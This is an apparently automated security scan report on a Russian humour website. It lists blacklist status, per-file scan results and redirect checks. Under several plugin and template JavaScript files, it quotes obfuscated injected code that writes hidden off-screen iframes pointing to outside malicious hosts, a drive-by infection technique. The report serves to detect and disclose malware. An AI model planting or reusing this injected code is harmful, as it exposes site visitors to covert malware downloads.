Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=smeysyatut.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://smeysyatut.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://smeysyatut.ru/ | 200 OK Content-Length: 47533 Content-Type: text/html | clean |
http://smeysyatut.ru/media/system/js/caption.js | 200 OK Content-Length: 570 Content-Type: application/javascript | clean |
http://smeysyatut.ru/plugins/content/mavikthumbnails/slimbox/js/slimbox.js | 200 OK Content-Length: 2185 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu } if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://vuretar.firebox-host.net/gfjvbnhgfkyupiu12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://smeysyatut.ru/plugins/content/rusbuttons/odkl_share.js | 200 OK Content-Length: 2185 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu } if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://vuretar.firebox-host.net/gfjvbnhgfkyupiu12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://smeysyatut.ru/plugins/content/ji_votitaly/js/votitalyplugin.js | 200 OK Content-Length: 7185 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu default: return 'undefined'; } }, log: function (string) { this.logmessages.include(string); }, showLogs: function () { this.logmessages.each(function (message) { console.log(message); }); }, hasLogs: function () { return this.logmessages.length > 0; }, emptyLogs: function () { this.logmessages = []; } }); VotitalyPlugin.implement(new Options); Antivirus reports:
| ||
http://smeysyatut.ru/templates/new_template/script.js | 200 OK Content-Length: 4592 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Opelcorsamodel() {
var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.armincl.info/cardelasa.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); (function(){ fu } ready(); })(); } if (browser.opera) { document.addEventListener('DOMContentLoaded', function() { for (var i = 0; i < document.styleSheets.length; i++) { if (document.styleSheets[i].disabled) { setTimeout(arguments.callee, 10); return; } } ready(); }, false); } if (browser.safari || browser.chrome) { var numStyles; (function() { if (d Antivirus reports:
| ||
http://vkontakte.ru/js/api/share.js?10 | 200 OK Content-Length: 10156 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 100803 Content-Type: application/javascript | clean |
http://smeysyatut.ru/thebest | 200 OK Content-Length: 35657 Content-Type: text/html | clean |
http://smeysyatut.ru/sobranie | 200 OK Content-Length: 34040 Content-Type: text/html | clean |
http://smeysyatut.ru/freshanekdots | 200 OK Content-Length: 36490 Content-Type: text/html | clean |
http://smeysyatut.ru/stories | 200 OK Content-Length: 32290 Content-Type: text/html | clean |
http://smeysyatut.ru/evrhumor | 200 OK Content-Length: 30036 Content-Type: text/html | clean |
http://smeysyatut.ru/sssr | 200 OK Content-Length: 31737 Content-Type: text/html | clean |
http://smeysyatut.ru/worldanekdots | 200 OK Content-Length: 33200 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: smeysyatut.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 00:21:19 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 27 Aug 2014 00:21:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1da9ee93f911af4dda5c839d2b420c8f=15fc96048a9be1d337b0af1c7c0c0694; path=/
GET / HTTP/1.1
Host: smeysyatut.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 27 Aug 2014 00:21:19 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 27 Aug 2014 00:21:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1da9ee93f911af4dda5c839d2b420c8f=15fc96048a9be1d337b0af1c7c0c0694; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: smeysyatut.ru
Referer: http://www.google.com/search?q=smeysyatut.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: smeysyatut.ru
Referer: http://www.google.com/search?q=smeysyatut.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.